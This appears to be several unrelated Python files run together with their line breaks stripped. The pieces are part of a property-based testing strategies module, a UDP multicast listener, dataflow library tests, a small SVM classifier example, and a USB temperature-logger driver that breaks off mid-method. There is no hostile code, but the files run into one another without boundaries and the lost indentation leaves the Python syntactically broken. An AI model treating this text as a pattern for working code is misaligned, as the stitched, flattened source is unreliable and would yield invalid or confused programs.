cache[cache_key] except TypeError: return fn(*args, **kwargs) except KeyError: result = fn(*args, **kwargs) cache[cache_key] = result return result return cached_strategy def defines_strategy(strategy_definition): from hypothesis.searchstrategy.deferred import DeferredStrategy @proxies(strategy_definition) def accept(*args, **kwargs): return DeferredStrategy(strategy_definition, args, kwargs) return accept def just(value): """Return a strategy which only generates value. Note: value is not copied. Be wary of using mutable values. """ from hypothesis.searchstrategy.misc import JustStrategy def calc_repr(): return 'just(%s)' % (repr(value),) return ReprWrapperStrategy(JustStrategy(value), calc_repr) @defines_strategy def none(): """Return a strategy which only generates None.""" return just(None) def one_of(arg, *args): """Return a strategy which generates values from any of the argument strategies.""" if not args: check_strategy(arg) return arg from hypothesis.searchstrategy.strategies import OneOfStrategy args = (arg,) + args for arg in args: check_strategy(arg) return OneOfStrategy(args) @cacheable @defines_strategy def integers(min_value=None, max_value=None): """Returns a strategy which generates integers (in Python 2 these may be ints or longs). If min_value is not None then all values will be >= min_value. 
If max_value is not None then all values will be <= max_value """ check_valid_integer(min_value) check_valid_integer(max_value) check_valid_interval(min_value, max_value, 'min_value', 'max_value') from hypothesis.searchstrategy.numbers import IntegersFromStrategy, \ BoundedIntStrategy, RandomGeometricIntStrategy, WideRangeIntStrategy if min_value is None: if max_value is None: return ( RandomGeometricIntStrategy() | WideRangeIntStrategy() ) else: return IntegersFromStrategy(0).map(lambda x: max_value - x) else: if max_value is None: return IntegersFromStrategy(min_value) else: if min_value == max_value: return just(min_value) return BoundedIntStrategy(min_value, max_value) @cacheable @defines_strategy def booleans(): """Returns a strategy which generates instances of bool.""" from hypothesis.searchstrategy.misc import BoolStrategy return BoolStrategy() def is_negative(x): return math.copysign(1, x) < 0 def count_between_floats(x, y): assert x <= y if is_negative(x): if is_negative(y): return float_to_int(x) - float_to_int(y) + 1 else: return count_between_floats(x, -0.0) + count_between_floats(0.0, y) else: assert not is_negative(y) return float_to_int(y) - float_to_int(x) + 1 def float_to_int(value): return ( struct.unpack(b'!Q', struct.pack(b'!d', value))[0] ) def int_to_float(value): return ( struct.unpack(b'!d', struct.pack(b'!Q', value))[0] ) @cacheable @defines_strategy def floats( min_value=None, max_value=None, allow_nan=None, allow_infinity=None ): """Returns a strategy which generates floats. - If min_value is not None, all values will be >= min_value. - If max_value is not None, all values will be <= max_value. - If min_value or max_value is not None, it is an error to enable allow_nan. - If both min_value and max_value are not None, it is an error to enable allow_infinity. Where not explicitly ruled out by the bounds, all of infinity, -infinity and NaN are possible values generated by this strategy. 
""" if allow_nan is None: allow_nan = bool(min_value is None and max_value is None) elif allow_nan: if min_value is not None or max_value is not None: raise InvalidArgument( 'Cannot have allow_nan=%r, with min_value or max_value' % ( allow_nan )) check_valid_bound(min_value, 'min_value') check_valid_bound(max_value, 'max_value') check_valid_interval(min_value, max_value, 'min_value', 'max_value') if min_value is not None: min_value = float(min_value) if max_value is not None: max_value = float(max_value) if min_value == float(u'-inf'): min_value = None if max_value == float(u'inf'): max_value = None if allow_infinity is None: allow_infinity = bool(min_value is None or max_value is None) elif allow_infinity: if min_value is not None and max_value is not None: raise InvalidArgument( 'Cannot have allow_infinity=%r, with both min_value and ' 'max_value' % ( allow_infinity )) from hypothesis.searchstrategy.numbers import WrapperFloatStrategy, \ GaussianFloatStrategy, BoundedFloatStrategy, ExponentialFloatStrategy,\ JustIntFloats, NastyFloats, FullRangeFloats, \ FixedBoundedFloatStrategy if min_value is None and max_value is None: return WrapperFloatStrategy( GaussianFloatStrategy() | BoundedFloatStrategy() | ExponentialFloatStrategy() | JustIntFloats() | NastyFloats(allow_nan, allow_infinity) | FullRangeFloats(allow_nan, allow_infinity) ) elif min_value is not None and max_value is not None: if min_value == max_value: return just(min_value) elif math.isinf(max_value - min_value): assert min_value < 0 and max_value > 0 return floats(min_value=0, max_value=max_value) | floats( min_value=min_value, max_value=0 ) elif count_between_floats(min_value, max_value) > 1000: critical_values = [ min_value, max_value, min_value + (max_value - min_value) / 2] if min_value <= 0 <= max_value: if not is_negative(max_value): critical_values.append(0.0) if is_negative(min_value): critical_values.append(-0.0) return FixedBoundedFloatStrategy( lower_bound=min_value, upper_bound=max_value ) | sampled_from(critical_values) elif is_negative(max_value): assert is_negative(min_value) ub_int = float_to_int(max_value) lb_int = float_to_int(min_value) assert ub_int <= lb_int return integers(min_value=ub_int, max_value=lb_int).map( int_to_float ) elif is_negative(min_value): return floats(min_value=min_value, max_value=-0.0) | floats( min_value=0, max_value=max_value ) else: ub_int = float_to_int(max_value) lb_int = float_to_int(min_value) assert lb_int <= ub_int return integers(min_value=lb_int, max_value=ub_int).map( int_to_float ) elif min_value is not None: critical_values = [min_value] if allow_infinity: critical_values.append(float(u'inf')) if is_negative(min_value): critical_values.append(-0.0) if min_value <= 0: critical_values.append(0.0) return ( floats(allow_infinity=allow_infinity, allow_nan=False).map( lambda x: assume(not math.isnan(x)) and min_value + abs(x) ) ) | sampled_from(critical_values) else: assert max_value is not None critical_values = [max_value] if allow_infinity: critical_values.append(float(u'-inf')) if max_value >= 0: critical_values.append(-0.0) if not is_negative(max_value): critical_values.append(0.0) return ( floats(allow_infinity=allow_infinity, allow_nan=False).map( lambda x: assume(not math.isnan(x)) and max_value - abs(x) ) ) | sampled_from(critical_values) @cacheable @defines_strategy def complex_numbers(): """Returns a strategy that generates complex numbers.""" from hypothesis.searchstrategy.numbers import ComplexStrategy return ComplexStrategy( tuples(floats(), floats()) ) 
@cacheable @defines_strategy def tuples(*args): """Return a strategy which generates a tuple of the same length as args by generating the value at index i from args[i]. e.g. tuples(integers(), integers()) would generate a tuple of length two with both values an integer. """ for arg in args: check_strategy(arg) from hypothesis.searchstrategy.collections import TupleStrategy return TupleStrategy(args, tuple) @defines_strategy def sampled_from(elements): """Returns a strategy which generates any value present in the iterable elements. Note that as with just, values will not be copied and thus you should be careful of using mutable data """ from hypothesis.searchstrategy.misc import SampledFromStrategy, \ JustStrategy elements = tuple(iter(elements)) if not elements: raise InvalidArgument( 'sampled_from requires at least one value' ) if len(elements) == 1: return JustStrategy(elements[0]) else: return SampledFromStrategy(elements) @cacheable @defines_strategy def lists( elements=None, min_size=None, average_size=None, max_size=None, unique_by=None, unique=False, ): """Returns a list containing values drawn from elements length in the interval [min_size, max_size] (no bounds in that direction if these are None). If max_size is 0 then elements may be None and only the empty list will be drawn. average_size may be used as a size hint to roughly control the size of list but it may not be the actual average of sizes you get, due to a variety of factors. If unique is True (or something that evaluates to True), we compare direct object equality, as if unique_by was `lambda x: x`. This comparison only works for hashable types. if unique_by is not None it must be a function returning a hashable type when given a value drawn from elements. The resulting list will satisfy the condition that for i != j, unique_by(result[i]) != unique_by(result[j]). 
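For example (an illustrative sketch, not an exhaustive description):
``lists(integers(), min_size=1, unique=True)`` describes non-empty lists of
distinct integers, while ``lists(tuples(text(), integers()),
unique_by=lambda t: t[0])`` describes lists of pairs whose first elements are
pairwise distinct.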
""" if unique: if unique_by is not None: raise InvalidArgument(( 'cannot specify both unique and unique_by (you probably only ' 'want to set unique_by)' )) else: unique_by = lambda x: x if unique_by is not None: from hypothesis.searchstrategy.collections import UniqueListStrategy if max_size == 0: return builds(list) check_strategy(elements) if min_size is not None and elements.template_upper_bound < min_size: raise InvalidArgument(( 'Cannot generate unique lists of size %d from %r, which ' 'contains no more than %d distinct values') % ( min_size, elements, elements.template_upper_bound, )) min_size = min_size or 0 max_size = max_size or float(u'inf') max_size = min(max_size, elements.template_upper_bound) if average_size is None: if max_size < float(u'inf'): if max_size <= 5: average_size = min_size + 0.75 * (max_size - min_size) else: average_size = (max_size + min_size) / 2 else: average_size = max( _AVERAGE_LIST_LENGTH, min_size * 2 ) check_valid_sizes(min_size, average_size, max_size) result = UniqueListStrategy( elements=elements, average_size=average_size, max_size=max_size, min_size=min_size, key=unique_by ) return result check_valid_sizes(min_size, average_size, max_size) from hypothesis.searchstrategy.collections import ListStrategy, \ SingleElementListStrategy if min_size is None: min_size = 0 if average_size is None: if max_size is None: average_size = _AVERAGE_LIST_LENGTH else: average_size = (min_size + max_size) * 0.5 if elements is None or (max_size is not None and max_size <= 0): if max_size is None or max_size > 0: raise InvalidArgument( 'Cannot create non-empty lists without an element type' ) else: return ListStrategy(()) else: check_strategy(elements) if elements.template_upper_bound == 1: from hypothesis.searchstrategy.numbers import IntegersFromStrategy if max_size is None: length_strat = IntegersFromStrategy( min_size, average_size=average_size - min_size) else: length_strat = integers(min_size, max_size) return SingleElementListStrategy(elements, length_strat) return ListStrategy( (elements,), average_length=average_size, min_size=min_size, max_size=max_size, ) @cacheable @defines_strategy def sets(elements=None, min_size=None, average_size=None, max_size=None): """This has the same behaviour as lists, but returns sets instead. Note that Hypothesis cannot tell if values are drawn from elements are hashable until running the test, so you can define a strategy for sets of an unhashable type but it will fail at test time. """ return lists( elements=elements, min_size=min_size, average_size=average_size, max_size=max_size, unique=True ).map(set) @cacheable @defines_strategy def frozensets(elements=None, min_size=None, average_size=None, max_size=None): """This is identical to the sets function but instead returns frozensets.""" return lists( elements=elements, min_size=min_size, average_size=average_size, max_size=max_size, unique=True ).map(frozenset) @defines_strategy def fixed_dictionaries(mapping): """Generate a dictionary of the same type as mapping with a fixed set of keys mapping to strategies. mapping must be a dict subclass. Generated values have all keys present in mapping, with the corresponding values drawn from mapping[key]. If mapping is an instance of OrderedDict the keys will also be in the same order, otherwise the order is arbitrary. 
""" from hypothesis.searchstrategy.collections import FixedKeysDictStrategy check_type(dict, mapping) for v in mapping.values(): check_type(SearchStrategy, v) return FixedKeysDictStrategy(mapping) @cacheable @defines_strategy def dictionaries( keys, values, dict_class=dict, min_size=None, average_size=None, max_size=None ): """Generates dictionaries of type dict_class with keys drawn from the keys argument and values drawn from the values argument. The size parameters have the same interpretation as for lists. """ check_valid_sizes(min_size, average_size, max_size) if max_size == 0: return fixed_dictionaries(dict_class()) check_strategy(keys) check_strategy(values) if min_size is not None and min_size > keys.template_upper_bound: raise InvalidArgument(( 'Cannot generate dictionaries of size %d with keys from %r, ' 'which contains no more than %d distinct values') % ( min_size, keys, keys.template_upper_bound, )) if max_size is None: max_size = keys.template_upper_bound else: max_size = min(max_size, keys.template_upper_bound) return lists( tuples(keys, values), min_size=min_size, average_size=average_size, max_size=max_size, unique_by=lambda x: x[0] ).map(dict_class) @cacheable @defines_strategy def streaming(elements): """Generates an infinite stream of values where each value is drawn from elements. The result is iterable (the iterator will never terminate) and indexable. """ check_strategy(elements) from hypothesis.searchstrategy.streams import StreamStrategy return StreamStrategy(elements) @cacheable @defines_strategy def characters(whitelist_categories=None, blacklist_categories=None, blacklist_characters=None, min_codepoint=None, max_codepoint=None): """Generates unicode text type (unicode on python 2, str on python 3) characters following specified filtering rules. This strategy accepts lists of Unicode categories, characters of which should (`whitelist_categories`) or should not (`blacklist_categories`) be produced. Also there could be applied limitation by minimal and maximal produced code point of the characters. If you know what exactly characters you don't want to be produced, pass them with `blacklist_characters` argument. """ from hypothesis.searchstrategy.strings import OneCharStringStrategy return OneCharStringStrategy(whitelist_categories=whitelist_categories, blacklist_categories=blacklist_categories, blacklist_characters=blacklist_characters, min_codepoint=min_codepoint, max_codepoint=max_codepoint) @cacheable @defines_strategy def text( alphabet=None, min_size=None, average_size=None, max_size=None ): """Generates values of a unicode text type (unicode on python 2, str on python 3) with values drawn from alphabet, which should be an iterable of length one strings or a strategy generating such. If it is None it will default to generating the full unicode range. If it is an empty collection this will only generate empty strings. min_size, max_size and average_size have the usual interpretations. 
""" from hypothesis.searchstrategy.strings import OneCharStringStrategy, \ StringStrategy if alphabet is None: char_strategy = OneCharStringStrategy(blacklist_categories=['Cs']) elif not alphabet: if (min_size or 0) > 0: raise InvalidArgument( 'Invalid min_size %r > 0 for empty alphabet' % ( min_size, ) ) return just(u'') elif isinstance(alphabet, SearchStrategy): char_strategy = alphabet else: char_strategy = sampled_from(list(map(text_type, alphabet))) return StringStrategy(lists( char_strategy, average_size=average_size, min_size=min_size, max_size=max_size )) @cacheable @defines_strategy def binary( min_size=None, average_size=None, max_size=None ): """Generates the appropriate binary type (str in python 2, bytes in python 3). min_size, average_size and max_size have the usual interpretations. """ from hypothesis.searchstrategy.strings import BinaryStringStrategy return BinaryStringStrategy( lists( integers(min_value=0, max_value=255), average_size=average_size, min_size=min_size, max_size=max_size ) ) @cacheable @defines_strategy def randoms(): """Generates instances of Random (actually a Hypothesis specific RandomWithSeed class which displays what it was initially seeded with)""" from hypothesis.searchstrategy.misc import RandomStrategy return RandomStrategy(integers()) class RandomSeeder(object): def __init__(self, seed): self.seed = seed def __repr__(self): return 'random.seed(%r)' % (self.seed,) @cacheable @defines_strategy def random_module(): """If your code depends on the global random module then you need to use this. It will explicitly seed the random module at the start of your test so that tests are reproducible. The value it passes you is an opaque object whose only useful feature is that its repr displays the random seed. It is not itself a random number generator. If you want a random number generator you should use the randoms() strategy which will give you one. """ from hypothesis.control import cleanup import random def seed_random(seed): state = random.getstate() random.seed(seed) cleanup(lambda: random.setstate(state)) return RandomSeeder(seed) return shared( integers().map(seed_random), 'hypothesis.strategies.random_module()', ) @cacheable @defines_strategy def fractions(): """Generates instances of fractions.Fraction.""" from fractions import Fraction return tuples(integers(), integers(min_value=1)).map( lambda t: Fraction(*t) ) @cacheable @defines_strategy def decimals(): """Generates instances of decimals.Decimal.""" return ( floats().map(float_to_decimal) | fractions().map( lambda f: Decimal(f.numerator) / f.denominator ) ) @cacheable @defines_strategy def builds(target, *args, **kwargs): """Generates values by drawing from args and kwargs and passing them to target in the appropriate argument position. e.g. builds(target, integers(), flag=booleans()) would draw an integer i and a boolean b and call target(i, flag=b). """ return tuples(tuples(*args), fixed_dictionaries(kwargs)).map( lambda value: target(*value[0], **value[1]) ) @defines_strategy def recursive(base, extend, max_leaves=100): """ base: A strategy to start from. extend: A function which takes a strategy and returns a new strategy. max_leaves: The maximum number of elements to be drawn from base on a given run. This returns a strategy S such that S = extend(base | S). That is, values maybe drawn from base, or from any strategy reachable by mixing applications of | and extend. 
An example may clarify: recursive(booleans(), lists) would return a strategy that may return arbitrarily nested and mixed lists of booleans. So e.g. False, [True], [False, []], [[[[True]]]], are all valid values to be drawn from that strategy. """ check_strategy(base) extended = extend(base) if not isinstance(extended, SearchStrategy): raise InvalidArgument( 'Expected extend(%r) to be a SearchStrategy but got %r' % ( base, extended )) from hypothesis.searchstrategy.recursive import RecursiveStrategy return RecursiveStrategy(base, extend, max_leaves) @defines_strategy def permutations(values): """Return a strategy which returns permutations of the collection "values".""" values = list(values) if not values: return just(()).map(lambda _: []) def build_permutation(swaps): initial = list(values) for i, j in swaps: initial[i], initial[j] = initial[j], initial[i] return initial n = len(values) index = integers(0, n - 1) return lists(tuples(index, index), max_size=n ** 2).map(build_permutation) @cacheable def composite(f): """Defines a strategy that is built out of potentially arbitrarily many other strategies. This is intended to be used as a decorator. See the full documentation for more details about how to use this function. """ from hypothesis.searchstrategy.morphers import MorpherStrategy from hypothesis.internal.reflection import copy_argspec argspec = getargspec(f) if ( argspec.defaults is not None and len(argspec.defaults) == len(argspec.args) ): raise InvalidArgument( 'A default value for initial argument will never be used') if len(argspec.args) == 0 and not argspec.varargs: raise InvalidArgument( 'Functions wrapped with composite must take at least one ' 'positional argument.' ) new_argspec = ArgSpec( args=argspec.args[1:], varargs=argspec.varargs, keywords=argspec.keywords, defaults=argspec.defaults ) base_strategy = streaming(MorpherStrategy()) @defines_strategy @copy_argspec(f.__name__, new_argspec) def accept(*args, **kwargs): def call_with_draw(morphers): index = [0] def draw(strategy): i = index[0] index[0] += 1 return morphers[i].become(strategy) return f(*((draw,) + args), **kwargs) return base_strategy.map(call_with_draw) return accept def shared(base, key=None): """Returns a strategy that draws a single shared value per run, drawn from base. Any two shared instances with the same key will share the same value, otherwise the identity of this strategy will be used. That is: >>> x = shared(s) >>> y = shared(s) In the above x and y may draw different (or potentially the same) values. In the following they will always draw the same: >>> x = shared(s, key="hi") >>> y = shared(s, key="hi") """ from hypothesis.searchstrategy.shared import SharedStrategy return SharedStrategy(base, key) @cacheable def choices(): """Strategy that generates a function that behaves like random.choice. Will note choices made for reproducibility. 
""" from hypothesis.control import note, current_build_context def build_chooser(stream): index = [-1] choice_count = [0] context = current_build_context() context.mark_captured() def choice(values): if not values: raise IndexError('Cannot choose from empty sequence') k = len(values) - 1 if k == 0: chosen = 0 else: mask = _right_saturate(k) while True: index[0] += 1 probe = stream[index[0]] & mask if probe <= k: chosen = probe break choice_count[0] += 1 result = values[chosen] with context.local(): note('Choice #%d: %r' % (choice_count[0], result)) return result return choice return ReprWrapperStrategy( shared( builds(build_chooser, streaming(integers(min_value=0))), key='hypothesis.strategies.chooser.choice_function' ), 'chooser()') @cacheable def uuids(): """Returns a strategy that generates UUIDs. All returned values from this will be unique, so e.g. if you do lists(uuids()) the resulting list will never contain duplicates. """ from uuid import UUID return ReprWrapperStrategy( shared(randoms(), key='hypothesis.strategies.uuids.generator').map( lambda r: UUID(int=r.getrandbits(128)) ), 'uuids()') # Private API below here def _right_saturate(x): x |= (x >> 1) x |= (x >> 2) x |= (x >> 4) x |= (x >> 8) x |= (x >> 16) x |= (x >> 32) return x def check_type(typ, arg): if not isinstance(arg, typ): if isinstance(typ, type): typ_string = typ.__name__ else: typ_string = 'one of %s' % ( ', '.join(t.__name__ for t in typ)) raise InvalidArgument( 'Expected %s but got %r' % (typ_string, arg,)) def check_strategy(arg): check_type(SearchStrategy, arg) def check_valid_integer(value): """Checks that value is either unspecified, or a valid integer. Otherwise raises InvalidArgument. """ if value is None: return check_type(integer_types, value) def check_valid_bound(value, name): """Checks that value is either unspecified, or a valid interval bound. Otherwise raises InvalidArgument. """ if value is None: return if math.isnan(value): raise InvalidArgument(u'Invalid end point %s %r' % (value, name)) def check_valid_size(value, name): """Checks that value is either unspecified, or a valid non-negative size expressed as an integer/float. Otherwise raises InvalidArgument. """ if value is None: return check_type(integer_types + (float,), value) if value < 0: raise InvalidArgument(u'Invalid size %s %r < 0' % (value, name)) if isinstance(value, float) and math.isnan(value): raise InvalidArgument(u'Invalid size %s %r' % (value, name)) def check_valid_interval(lower_bound, upper_bound, lower_name, upper_name): """Checks that lower_bound and upper_bound are either unspecified, or they define a valid interval on the number line. Otherwise raises InvalidArgumet. 
""" if lower_bound is None or upper_bound is None: return if upper_bound < lower_bound: raise InvalidArgument( 'Cannot have %s=%r < %s=%r' % ( upper_name, upper_bound, lower_name, lower_bound )) def check_valid_sizes(min_size, average_size, max_size): check_valid_size(min_size, 'min_size') check_valid_size(max_size, 'max_size') check_valid_size(average_size, 'average_size') check_valid_interval(min_size, max_size, 'min_size', 'max_size') check_valid_interval(average_size, max_size, 'average_size', 'max_size') check_valid_interval(min_size, average_size, 'min_size', 'average_size') if average_size is not None: if ( (max_size is None or max_size > 0) and average_size is not None and average_size <= 0.0 ): raise InvalidArgument( 'Cannot have average_size=%r < min_size=%r' % ( average_size, min_size )) _AVERAGE_LIST_LENGTH = 25.0 mcReceiver.py import socket import struct multicastIP = '192.168.3.11' multicastPort = 5007 IS_ALL_GROUPS = True sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if IS_ALL_GROUPS: # on this port, receives ALL multicast groups sock.bind(('', multicastPort)) else: # on this port, listen ONLY to multicastIP sock.bind((multicastIP, multicastPort)) msgReq = struct.pack("4sl", socket.inet_aton(multicastIP), socket.INADDR_ANY) sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, msgReq) while True: print(sock.recv(10240))import bytewax import pytest def test_map(): out = [] def add_one(item): return item + 1 ec = bytewax.Executor() flow = ec.Dataflow( [ (0, 0), (0, 1), (0, 2), ] ) flow.map(add_one) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (0, 1), (0, 2), (0, 3), ] ) def test_flat_map(): out = [] def split_into_words(sentence): return sentence.split() ec = bytewax.Executor() flow = ec.Dataflow( [ (1, "split this"), ] ) flow.flat_map(split_into_words) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (1, "split"), (1, "this"), ] ) def test_filter(): out = [] def is_odd(item): return item % 2 != 0 ec = bytewax.Executor() flow = ec.Dataflow( [ (0, 1), (0, 2), (0, 3), ] ) flow.filter(is_odd) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted([(0, 1), (0, 3)]) def test_inspect(): out = [] ec = bytewax.Executor() flow = ec.Dataflow( [ (1, "a"), ] ) flow.inspect(out.append) ec.build_and_run() assert out == ["a"] def test_inspect_epoch(): out = [] ec = bytewax.Executor() flow = ec.Dataflow( [ (1, "a"), ] ) flow.inspect_epoch(lambda epoch, item: out.append((epoch, item))) ec.build_and_run(ctrlc=False) assert out == [(1, "a")] def test_reduce(): out = [] def user_as_key(event): return (event["user"], [event]) def extend_session(session, event): return session + event def session_complete(session): return any(event["type"] == "logout" for event in session) ec = bytewax.Executor() flow = ec.Dataflow( [ (0, {"user": "a", "type": "login"}), (1, {"user": "a", "type": "post"}), (1, {"user": "b", "type": "login"}), (2, {"user": "a", "type": "logout"}), (3, {"user": "b", "type": "logout"}), ] ) flow.map(user_as_key) flow.reduce(extend_session, session_complete) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ ( 2, ( "a", [ {"user": "a", "type": "login"}, {"user": "a", "type": "post"}, {"user": "a", "type": "logout"}, ], ), ), ( 3, ( "b", [ {"user": "b", "type": "login"}, {"user": "b", "type": "logout"}, ], ), ), ] ) def test_reduce_epoch(): out = [] 
def add_initial_count(event): return event["user"], 1 def count(count, event_count): return count + event_count ec = bytewax.Executor() flow = ec.Dataflow( [ (0, {"user": "a", "type": "login"}), (0, {"user": "a", "type": "post"}), (0, {"user": "b", "type": "login"}), (1, {"user": "b", "type": "post"}), ] ) flow.map(add_initial_count) flow.reduce_epoch(count) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (0, ("a", 2)), (0, ("b", 1)), (1, ("b", 1)), ] ) def test_reduce_epoch_local(): # Can't run multiple workers from code yet. pass def test_stateful_map(): out = [] def build_seen(): return set() def add_key(item): return item, item def check(seen, value): if value in seen: return seen, True else: seen.add(value) return seen, False def remove_seen(key__is_seen): key, is_seen = key__is_seen if not is_seen: return [key] else: return [] ec = bytewax.Executor() flow = ec.Dataflow( [ (0, "a"), (0, "a"), (1, "a"), (1, "b"), ] ) flow.map(add_key) flow.stateful_map(build_seen, check) flow.flat_map(remove_seen) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (0, "a"), (1, "b"), ] ) def test_capture(): out = [] inp = [ (0, "a"), (1, "b"), ] ec = bytewax.Executor() flow = ec.Dataflow(inp) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted(inp) import numpy as np from sklearn import svm X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]]) Y = np.array([1, 1, 2, 2]) clf = svm.SVC(gamma='auto') print(type(clf)) clf.fit(X, Y) print(clf.support_vectors_) print(clf.n_support_) V1 = [-2, -2] V2 = [2, 2] V = [V1,V2] print(clf.predict([V1])) print(clf.predict([V2])) print(clf.predict(V))''' Created on 23.11.2017 @author: @license: pylarexx is licensed under the Apache License, version 2, see License.txt ''' import usb.core import time import math import array import datalogger.Sensor import datalogger.DataListener from datalogger.DataListener import DataListener import logging import yaml from datalogger.Sensor import ArexxSensorDetector from datetime import datetime from pprint import pformat # import traceback class TLX00(object): ''' This class handles USB connection and communication for Arexx TL-300 and TL-500 devices and BS-510 ''' TIME_OFFSET = 946681200 # Timestamp of 2000-01-01 00:00:00 def __init__(self, params): self.devices=[] self.listeners=[] self.sensors={} self.requestBuffer = array.array('B', [0]*64) self.config={} self.detectUnknownSensors=True self.lastDeviceCheck=0 if 'conffile' in params: self.readConfigFile(params['conffile']) ## This method extract the information stored in the config file /etc/pylarexx.yml with the differnt config sections ## def readConfigFile(self,filename): with open(filename) as f: content=f.read() self.config=yaml.load(content) logging.debug(self.config) if 'sensors' in self.config: try: for sensor in self.config['sensors']: sensorid=int(sensor['id']) sensortype=None if 'type' in sensor: sensortype=sensor['type'] name = None if 'name' in sensor: name=sensor['name'] logging.info("Adding Sensor from config file: %d %s %s"%(sensorid,sensortype,name)) # Todo: Sensortype weg machen if sensortype in ('TL-3TSN','TSN-50E','TSN-EXT44','TSN-33MN'): self.sensors[sensorid]=datalogger.Sensor.ArexxTemperatureSensor(sensorid,sensortype,name) elif sensortype in ('TSN-TH70E', 'TSN-TH77ext'): self.sensors[sensorid]=datalogger.Sensor.ArexxTemperatureSensor(sensorid,sensortype,name) self.sensors[sensorid+1]=datalogger.Sensor.ArexxHumiditySensor(sensorid+1,sensortype,name) else: 
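# Added note (descriptive comment, not from the original author): when the configured
# sensor type is not one of the known TL-3TSN / TSN-* models handled above, the branch
# below falls back to auto-detection via ArexxSensorDetector; if detection also fails,
# a generic datalogger.Sensor.Sensor is registered so the id from the YAML config file
# is still tracked under the configured name.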
detected_sensor = self.detectSensor(sensorid, name) if detected_sensor != False: self.addSensor(detected_sensor) else: self.sensors[sensorid]= datalogger.Sensor.Sensor(sensorid) self.sensors[sensorid].setName(name) except Exception as e: logging.error('Error in config section sensors: %s',e) logging.debug('Stacktrace: ',exc_info=True) if 'calibration' in self.config: for c in self.config['calibration']: try: sensorid=int(c['id']) if not sensorid in self.sensors: logging.error('Calibration values found for sensor %i, but sensor not defined in config',sensorid) continue; for n,v in c['values'].items(): self.sensors[sensorid].calibrationValues[n] = float(v) logging.debug("Calibration value for sensor %d oder %d value %f"%(sensorid,n,float(v))) except Exception as e: logging.error('Error in config section calibration: %s',e) logging.debug('Stacktrace: ',exc_info=True) if 'output' in self.config: for logger in self.config['output']: try: loggerType = logger.get('type') params= logger.get('params',{}) listenerClass = getattr(datalogger.DataListener,loggerType) self.registerDataListener(listenerClass(params)) except Exception as e: logging.error('Error in config section output: %s',e) logging.debug('Stacktrace: ',exc_info=True) if 'config' in self.config: if 'DetectUnknownSensors' in self.config['config']: self.detectUnknownSensors=bool(self.config['config']['DetectUnknownSensors']) # detect sensor and return it. Returns False, if no sensor was detected. # If detectUnknownSensors is set to false, return a sensor only if it is in config via displayid def detectSensor(self,sensorid,name=None): detector = ArexxSensorDetector() detected_sensor = detector.detectDevice(sensorid) is_in_config=False if detected_sensor != False: logging.debug("Detected Sensor: %s(%s)" % (detected_sensor.id, detected_sensor.type) ) if name != None: detected_sensor.setName(name) else:# check if we have a sensor in config with the same display id. Then copy name for sensor in self.sensors.items(): if sensor[0] == detected_sensor.displayid: detected_sensor.setName(sensor[1].name) logging.info("Setting name of detected sensor to: %s" % detected_sensor.name) is_in_config=True if self.detectUnknownSensors or is_in_config: return detected_sensor return False # checks if data match to sensor value range and time def validateSensorData(self,data,sensor): if abs(time.time() - data["timestamp"]) > 4000: # On DST changes we can get 3600sec difference. logging.info("validateSensorData: timestamp %s is stale. Is a buffering receiver used?", datetime.fromtimestamp(data["timestamp"]).strftime('%Y-%m-%d %H:%M:%S')) cooked=sensor.rawToCooked(data["rawvalue"]) if cooked > sensor.valmax or cooked < sensor.valmin: logging.info("validateSensorData: Datapoint %f outside range (%f/%f). Ignoring." 
% (cooked, sensor.valmin, sensor.valmax)) return False return True def addSensor(self,detected_sensor): logging.info("Adding Sensor %s", detected_sensor.name) self.sensors[detected_sensor.id] = detected_sensor def removeSensor(self,sensorid): logging.info("Removing Sensor %s", self.sensors[sensorid].name) self.sensors.pop(sensorid) # Method to reset the requestBuffer to 0 to have a clean starting buffer def clearRequestBuffer(self): for i in range(0,63): self.requestBuffer[i]=0 # this method looks for logger attached via USB on the system def findDevices(self): self.lastDeviceCheck = math.floor(time.time()) founddevices = usb.core.find(find_all= True, idVendor=0x0451, idProduct=0x3211) self.devices = list(founddevices) if self.devices is not None: logging.info("Found Arexx Datalogger device(s) at ") for d in self.devices: d.lastTimeDataRead = 0 d.deviceErrors = 0 d.lastTimeSync = 0 d.lastTimeDelete = 0 logging.info("Bus %d Address %d Port Number %d " % (d.bus,d.address,d.port_number)) return True logging.error("No device found") return False def checkForNewDevices(self): self.lastDeviceCheck = math.floor(time.time()) founddevices = usb.core.find(find_all= True, idVendor=0x0451, idProduct=0x3211) numdevices = len(list(founddevices)) if numdevices != len(self.devices): return True return False def initializeDevices(self): for d in self.devices: try: d.set_configuration() cfg = d.get_active_configuration() intf = cfg[(0,0)] epo = usb.util.find_descriptor(intf, custom_match = lambda e: usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_OUT) epi = usb.util.find_descriptor(intf, custom_match = lambda e: usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_IN ) d.outAddress = epo.bEndpointAddress d.inAddress = epi.bEndpointAddress logging.info("Device on Bus %d Address %d Port Number %d uses Addresses %d/%d for in/out" % (d.bus,d.address,d.port_number,d.inAddress,d.outAddress)) self.setTime(d) except Exception as e: logging.error("Error initializing device at Bus %d Address %d Port Number %d. Resetting and removing device" % (d.bus,d.address,d.port_number)) logging.error("Error Message: %s" % e) try: d.reset() except Exception as ne: logging.error("Error resetting device: %s" % ne) self.devices.remove(d) # Method to set the time on the logging device def setTime(self,device): logging.debug("Setting time for USB device at Bus %d Address %d Port Number %d" % (device.bus,device.address,device.port_number)) # set mode self.clearRequestBuffer() self.requestBuffer[0]=4 # Protocol.txt says with type 04 the time can be set on the device # put time in array t=math.floor(time.time())-self.TIME_OFFSET tb=t.to_bytes(4,byteorder='little') for i in range(0,4): self.requestBuffer[i+1]=tb[i] # The created buffer will tell the BS-XX0 to ge ready for a time setting. # the buffer containts the type 4 message and the datetime in u32le 